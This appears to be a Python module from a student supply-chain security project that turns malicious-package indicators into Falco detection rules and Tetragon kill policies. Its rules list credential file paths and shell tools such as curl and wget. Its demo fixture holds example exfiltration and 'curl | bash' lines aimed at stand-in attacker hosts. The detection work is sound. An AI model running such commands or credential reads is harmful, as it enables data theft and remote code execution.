"""
Falco TracingPolicy / 일반 Falco rule 자동 생성기.

근거:
  - Falco rules YAML — https://falco.org/docs/rules/
  - Cilium Tetragon TracingPolicy — https://tetragon.io/docs/concepts/tracing-policy/

졸업과제 시연 흐름:
  우리 도구가 새 악성 패키지 발견 → 추출된 IoC (도메인, 실행 명령어,
  의심 syscall) 를 Falco/Tetragon 룰로 자동 생성 → 컨테이너 환경에서
  해당 IoC 발생 시 Falco 가 알림 / Tetragon 이 차단.

생성 가능한 룰:
  1. Falco macro + rule (alert only)
     - 알려진 악성 도메인으로의 outbound DNS / connect
     - 우리가 detect 한 exec command 실행 시
  2. Tetragon TracingPolicy (kernel-level enforcement)
     - 같은 syscall 후킹 + sigkill action
"""
from __future__ import annotations

import os
from dataclasses import dataclass

# ─────────────── 헬퍼 ───────────────

def _extract_iocs(report: dict) -> dict[str, list[str]]:
    """report 의 evidence 와 advisory_summary 에서 IoC 추출."""
    domains: set[str] = set()
    ips: set[str] = set()
    commands: set[str] = set()

    # advisory 에 적힌 IoC
    pm = report.get("package_meta") or {}
    summary = pm.get("advisory_summary", "")

    # evidence 의 code_snippet 에서 도메인/명령어 추출
    for ev in report.get("evidence", []) or []:
        snippet = ev.get("code_snippet", "") or ""
        # 단순 추출 — URL/도메인
        import re
        for m in re.finditer(
            r"https?://([a-zA-Z0-9.\-]+)(?::\d+)?", snippet,
        ):
            domains.add(m.group(1))
        # bash command 류
        for m in re.finditer(
            r"(?:^|[\s'\"])(curl\s+\S+|wget\s+\S+|sh\s+-c\s+\S+|"
            r"powershell\s+\S+|/bin/bash\s+\S+)", snippet,
        ):
            commands.add(m.group(1)[:200])

    # advisory 에서도 추출
    import re
    for m in re.finditer(
        r"https?://([a-zA-Z0-9.\-]+)", summary,
    ):
        domains.add(m.group(1))

    return {
        "domains": sorted(domains),
        "ips": sorted(ips),
        "commands": sorted(commands),
    }


def _safe_id(*parts: str) -> str:
    raw = "-".join(parts).lower()
    return "".join(c if c.isalnum() or c == "-" else "-" for c in raw)[:60]


# ─────────────── Falco rule (YAML 직접 생성) ───────────────

def _yaml_escape(s: str) -> str:
    return s.replace("'", "''")


def to_falco_rules(report: dict) -> str:
    """report → Falco rules YAML 문자열.

    의존성 없이 직접 YAML 생성 (PyYAML 미설치도 OK).
    """
    pkg = report.get("package", "?")
    eco = report.get("ecosystem", "?")
    ver = report.get("version", "?")
    verdict = report.get("verdict", "ERROR")
    iocs = _extract_iocs(report)

    rules: list[str] = []
    rule_id_base = _safe_id("agentic", eco, pkg, ver)

    # 헤더
    rules.append("# Auto-generated by pkgsentinel/2.0")
    rules.append(f"# Source: {eco}/{pkg}@{ver} (verdict={verdict})")
    rules.append("")

    # macro: 악성 도메인 list
    if iocs["domains"]:
        domains_str = ", ".join(f"'{_yaml_escape(d)}'" for d in iocs["domains"][:50])
        rules.append(f"- macro: agentic_known_bad_domains_{rule_id_base}")
        rules.append("  condition: >")
        rules.append(f"    fd.sip.name in ({domains_str})")
        rules.append("")

        rules.append(f"- rule: Agentic Outbound to known-bad domain ({pkg})")
        rules.append("  desc: >")
        rules.append(
            f"    Connection to a domain associated with malicious package "
            f"{eco}/{pkg}@{ver} (verdict={verdict})."
        )
        rules.append("  condition: >")
        rules.append(
            f"    outbound and agentic_known_bad_domains_{rule_id_base}"
        )
        rules.append("  output: >")
        rules.append(
            f"    Agentic outbound connection to {pkg} IoC domain "
            f"(proc.cmdline=%proc.cmdline fd.name=%fd.name "
            f"container.id=%container.id)"
        )
        rules.append("  priority: WARNING")
        rules.append("  tags: [agentic, supply-chain, network]")
        rules.append("")

    # rule: 의심 명령어
    if iocs["commands"]:
        ", ".join(f"'{_yaml_escape(c)}'" for c in iocs["commands"][:30])
        rules.append(f"- rule: Agentic Suspicious exec ({pkg})")
        rules.append("  desc: >")
        rules.append(
            f"    Execution of command pattern observed in malicious package "
            f"{eco}/{pkg}@{ver}."
        )
        rules.append("  condition: >")
        rules.append(
            "    spawned_process and "
            "(proc.cmdline contains 'curl' or proc.cmdline contains 'wget' "
            "or proc.cmdline contains 'powershell -e' "
            "or proc.cmdline contains 'base64 -d')"
        )
        rules.append("  output: >")
        rules.append(
            f"    Agentic suspicious exec linked to {pkg} "
            f"(proc.cmdline=%proc.cmdline)"
        )
        rules.append("  priority: WARNING")
        rules.append("  tags: [agentic, supply-chain, exec]")
        rules.append("")

    if not iocs["domains"] and not iocs["commands"]:
        rules.append("# No extractable IoCs from this report")
        rules.append("# (no domains or commands found in evidence/snippets)")

    return "\n".join(rules)


# ─────────────── Tetragon TracingPolicy ───────────────

def to_tracing_policy(report: dict) -> str:
    """report → Cilium Tetragon TracingPolicy CRD YAML.

    syscall (connect, execve) hook + Sigkill action 포함 (kernel-level 차단).
    """
    pkg = report.get("package", "?")
    eco = report.get("ecosystem", "?")
    ver = report.get("version", "?")
    iocs = _extract_iocs(report)
    rule_id = _safe_id("agentic", eco, pkg, ver)

    # YAML 직접 — PyYAML 의존 없이
    lines = [
        "apiVersion: cilium.io/v1alpha1",
        "kind: TracingPolicy",
        "metadata:",
        f"  name: agentic-{rule_id}",
        "  labels:",
        "    pkgsentinel.io/source: pkgsentinel",
        f"    pkgsentinel.io/verdict: {report.get('verdict','ERROR')}",
        f"    pkgsentinel.io/ecosystem: {eco}",
        f"    pkgsentinel.io/package: {_safe_id(pkg)}",
        "  annotations:",
        f"    pkgsentinel.io/source-ref: '{eco}/{pkg}@{ver}'",
        "spec:",
        "  kprobes:",
    ]

    # outbound connect 차단
    if iocs["domains"]:
        lines.append("  - call: tcp_connect")
        lines.append("    syscall: false")
        lines.append("    args:")
        lines.append("    - index: 0")
        lines.append("      type: sock")
        lines.append("    selectors:")
        lines.append("    - matchArgs:")
        lines.append("      - index: 0")
        lines.append("        operator: DAddr")
        lines.append("        values:")
        for d in iocs["domains"][:50]:
            lines.append(f"        - {d}")
        lines.append("      matchActions:")
        lines.append("      - action: Sigkill")
        lines.append("")

    # execve hook — curl/wget/powershell
    lines.append("  - call: __x64_sys_execve")
    lines.append("    syscall: true")
    lines.append("    args:")
    lines.append("    - index: 0")
    lines.append("      type: string")
    lines.append("    - index: 1")
    lines.append("      type: charbuf")
    lines.append("    selectors:")
    lines.append("    - matchArgs:")
    lines.append("      - index: 0")
    lines.append("        operator: Postfix")
    lines.append("        values:")
    lines.append("        - /curl")
    lines.append("        - /wget")
    lines.append("        - /powershell")
    lines.append("        - /bash")
    lines.append("      matchActions:")
    lines.append("      - action: Sigkill")

    return "\n".join(lines)


# ─────────────── Generic strict-mode 정책 (#R1) ───────────────

# 신뢰 registry 도메인 / IP — 외부 connect 정책에서 제외
TRUSTED_REGISTRY_DOMAINS = (
    "pypi.org", "files.pythonhosted.org",
    "registry.npmjs.org",
    "rubygems.org", "crates.io",
    "raw.githubusercontent.com", "github.com",
    "storage.googleapis.com",
)


def generate_strict_mode_falco() -> str:
    """모든 pip/npm/node 프로세스에 적용되는 generic strict 정책.

    *어떤 패키지든* 다음 행동 시도 시 alert + (Tetragon 측에선 kill):
      - SSH/AWS/cred 파일 read
      - registry 외 외부 IP/도메인 connect
      - install-time 쉘 실행 (postinstall/setup.py)
      - shadow / passwd 변조

    per-package 룰 (FalcoPolicySink.emit) 과 *병행* 배포.
    무명 zero-day 가 install 시점에 위 행동 시도 → 즉시 catch.
    """
    domains = ", ".join(f"'{d}'" for d in TRUSTED_REGISTRY_DOMAINS)
    lines = [
        "# pkgsentinel — Generic strict-mode Falco rules",
        "# 모든 pip/npm/node-managed 프로세스에 적용. per-package 룰과 병행.",
        "# 출력: /etc/falco/rules.d/pkgsentinel-strict.yaml",
        "",
        "- list: pkgsentinel_pkg_processes",
        "  items: [pip, pip3, npm, npx, node, yarn, pnpm, setup.py, easy_install]",
        "",
        "- list: pkgsentinel_trusted_domains",
        f"  items: [{domains}]",
        "",
        "- list: pkgsentinel_cred_paths",
        "  items:",
        "    - /root/.ssh",
        "    - /home",
        "    - /Users",
        "    - /.aws/credentials",
        "    - /.aws/config",
        "    - /etc/shadow",
        "    - /.npmrc",
        "    - /.pypirc",
        "    - /.netrc",
        "",
        "- macro: pkgsentinel_pkg_proc_ancestor",
        "  condition: >",
        "    proc.aname[1] in (pkgsentinel_pkg_processes) or",
        "    proc.aname[2] in (pkgsentinel_pkg_processes) or",
        "    proc.aname[3] in (pkgsentinel_pkg_processes)",
        "",
        "- rule: pkgsentinel_strict_cred_access",
        "  desc: 'pkgsentinel: any pip/npm-rooted process accessed credentials'",
        "  condition: >",
        "    evt.type in (openat, open) and",
        "    (fd.name pmatch '*/.ssh/*' or",
        "     fd.name pmatch '*/.aws/credentials' or",
        "     fd.name pmatch '*/.aws/config' or",
        "     fd.name = /etc/shadow or",
        "     fd.name pmatch '*/.npmrc' or",
        "     fd.name pmatch '*/.pypirc' or",
        "     fd.name pmatch '*/.netrc' or",
        "     fd.name pmatch '*/Library/Application Support/Google/*' or",
        "     fd.name pmatch '*/AppData/Roaming/Mozilla/*') and",
        "    pkgsentinel_pkg_proc_ancestor",
        "  output: >",
        "    pkgsentinel STRICT: package install process accessed credentials",
        "    (proc=%proc.name file=%fd.name pid=%proc.pid pkg_root=%proc.aname[2])",
        "  priority: CRITICAL",
        "  tags: [pkgsentinel, supply-chain, credential-access, strict-mode]",
        "",
        "- rule: pkgsentinel_strict_external_connect",
        "  desc: 'pkgsentinel: package process connected outside registry CDN'",
        "  condition: >",
        "    evt.type = connect and",
        "    fd.typechar = 4 and",
        "    not fd.sip = 127.0.0.1 and",
        "    not fd.sip startswith '10.' and",
        "    not fd.sip startswith '172.' and",
        "    not fd.sip startswith '192.168.' and",
        "    not fd.sip startswith '169.254.' and",
        "    pkgsentinel_pkg_proc_ancestor",
        "  output: >",
        "    pkgsentinel STRICT: package install process connected external",
        "    (dst=%fd.sip:%fd.sport proc=%proc.cmdline pid=%proc.pid)",
        "  priority: CRITICAL",
        "  tags: [pkgsentinel, supply-chain, network-egress, strict-mode]",
        "",
        "- rule: pkgsentinel_strict_shell_in_install",
        "  desc: 'pkgsentinel: shell spawned during package install hook'",
        "  condition: >",
        "    evt.type = execve and",
        "    proc.name in (sh, bash, zsh, dash, pwsh, powershell) and",
        "    pkgsentinel_pkg_proc_ancestor",
        "  output: >",
        "    pkgsentinel STRICT: install hook executed shell",
        "    (cmdline=%proc.cmdline pkg_root=%proc.aname[2])",
        "  priority: WARNING",
        "  tags: [pkgsentinel, supply-chain, install-hook, strict-mode]",
        "",
        "- rule: pkgsentinel_strict_persistence_attempt",
        "  desc: 'pkgsentinel: install hook wrote crontab / systemd / launchd'",
        "  condition: >",
        "    evt.type in (openat, open) and",
        "    (evt.is_open_write = true or evt.is_open_create = true) and",
        "    (fd.name pmatch '*/crontab' or",
        "     fd.name pmatch '/etc/cron*' or",
        "     fd.name pmatch '/etc/systemd/system/*' or",
        "     fd.name pmatch '*/Library/LaunchAgents/*' or",
        "     fd.name pmatch '*/Library/LaunchDaemons/*' or",
        "     fd.name pmatch '*/.bashrc' or",
        "     fd.name pmatch '*/.zshrc') and",
        "    pkgsentinel_pkg_proc_ancestor",
        "  output: >",
        "    pkgsentinel STRICT: install hook tried persistence",
        "    (file=%fd.name proc=%proc.cmdline)",
        "  priority: CRITICAL",
        "  tags: [pkgsentinel, supply-chain, persistence, strict-mode]",
    ]
    return "\n".join(lines) + "\n"


def generate_strict_mode_tetragon() -> str:
    """Tetragon eBPF 정책 — Sigkill 활성. *어떤* pip/npm 프로세스든
    위험 syscall 시도 시 즉시 프로세스 종료.
    """
    lines = [
        "# pkgsentinel — Generic strict-mode Tetragon TracingPolicy",
        "# 출력: kubectl apply -f - 또는 /etc/tetragon/tracing-policies/",
        "",
        "apiVersion: cilium.io/v1alpha1",
        "kind: TracingPolicy",
        "metadata:",
        "  name: pkgsentinel-strict-mode",
        "  labels:",
        "    app: pkgsentinel",
        "    mode: strict",
        "spec:",
        "  kprobes:",
        "    # 자격증명 파일 openat → Sigkill",
        "    - call: 'sys_openat'",
        "      syscall: true",
        "      args:",
        "        - index: 0",
        "          type: 'int'",
        "        - index: 1",
        "          type: 'string'",
        "        - index: 2",
        "          type: 'int'",
        "      selectors:",
        "        - matchBinaries:",
        "            - operator: 'In'",
        "              values:",
        "                - '/usr/bin/pip'",
        "                - '/usr/bin/pip3'",
        "                - '/usr/bin/npm'",
        "                - '/usr/bin/node'",
        "                - '/usr/local/bin/npm'",
        "                - '/usr/local/bin/node'",
        "                - '/usr/local/bin/pip'",
        "          matchArgs:",
        "            - index: 1",
        "              operator: 'Postfix'",
        "              values:",
        "                - '/.ssh/id_rsa'",
        "                - '/.ssh/id_ed25519'",
        "                - '/.aws/credentials'",
        "                - '/.aws/config'",
        "                - '/.npmrc'",
        "                - '/.pypirc'",
        "                - '/.netrc'",
        "                - '/etc/shadow'",
        "          matchActions:",
        "            - action: Sigkill",
        "    # 외부 IP connect → Sigkill",
        "    - call: 'tcp_connect'",
        "      args:",
        "        - index: 0",
        "          type: 'sock'",
        "      selectors:",
        "        - matchBinaries:",
        "            - operator: 'In'",
        "              values:",
        "                - '/usr/bin/pip'",
        "                - '/usr/bin/npm'",
        "                - '/usr/bin/node'",
        "                - '/usr/local/bin/npm'",
        "                - '/usr/local/bin/node'",
        "          matchArgs:",
        "            - index: 0",
        "              operator: 'NotDAddr'",
        "              values:",
        "                - '127.0.0.0/8'",
        "                - '10.0.0.0/8'",
        "                - '172.16.0.0/12'",
        "                - '192.168.0.0/16'",
        "                - '169.254.0.0/16'",
        "          matchActions:",
        "            - action: Sigkill",
    ]
    return "\n".join(lines) + "\n"


# ─────────────── Sink ───────────────

@dataclass
class FalcoPolicySink:
    """결과를 디스크에 저장하는 sink (kubectl apply 가능 형태)."""
    out_dir: str
    emit_falco: bool = True
    emit_tetragon: bool = True
    emit_strict_mode: bool = False     # True 면 generic strict 정책도 함께 dump

    def emit(self, report: dict) -> dict:
        os.makedirs(self.out_dir, exist_ok=True)
        pkg = report.get("package", "x")
        eco = report.get("ecosystem", "x")
        ver = report.get("version", "x")
        base = _safe_id(eco, pkg, ver)

        out: dict = {}
        if self.emit_falco:
            falco_path = os.path.join(self.out_dir, f"{base}.falco.yaml")
            with open(falco_path, "w", encoding="utf-8") as f:
                f.write(to_falco_rules(report))
            out["falco"] = falco_path

        if self.emit_tetragon:
            tg_path = os.path.join(self.out_dir, f"{base}.tetragon.yaml")
            with open(tg_path, "w", encoding="utf-8") as f:
                f.write(to_tracing_policy(report))
            out["tetragon"] = tg_path

        if self.emit_strict_mode:
            # 한 번만 — 모든 emit() 호출 시 덮어쓰기 (전역 정책).
            sf = os.path.join(self.out_dir, "pkgsentinel-strict.falco.yaml")
            with open(sf, "w", encoding="utf-8") as f:
                f.write(generate_strict_mode_falco())
            out["strict_falco"] = sf
            st = os.path.join(self.out_dir, "pkgsentinel-strict.tetragon.yaml")
            with open(st, "w", encoding="utf-8") as f:
                f.write(generate_strict_mode_tetragon())
            out["strict_tetragon"] = st

        return out


# ─────────────── CLI 데모 ───────────────

if __name__ == "__main__":
    rep = {
        "verdict": "MALICIOUS",
        "package": "evil-helpers",
        "ecosystem": "PyPI",
        "version": "0.0.1",
        "evidence": [{
            "code_snippet": "requests.post('https://attacker.example.com/exfil', data=secret)",
            "ttp_id": "T1041",
            "ttp_url": "https://attack.mitre.org/techniques/T1041/",
            "llm_reasoning": "credential exfil",
            "confidence": 0.92,
        }, {
            "code_snippet": "subprocess.run('curl http://evil.cdn/x.sh | bash', shell=True)",
            "ttp_id": "T1059",
            "ttp_url": "https://attack.mitre.org/techniques/T1059/",
            "llm_reasoning": "shell exec",
            "confidence": 0.85,
        }],
        "package_meta": {"advisory_summary":
                         "Sends to https://attacker.example.com/c2"},
    }
    print("=== Falco rules ===")
    print(to_falco_rules(rep))
    print("\n=== Tetragon TracingPolicy ===")
    print(to_tracing_policy(rep))
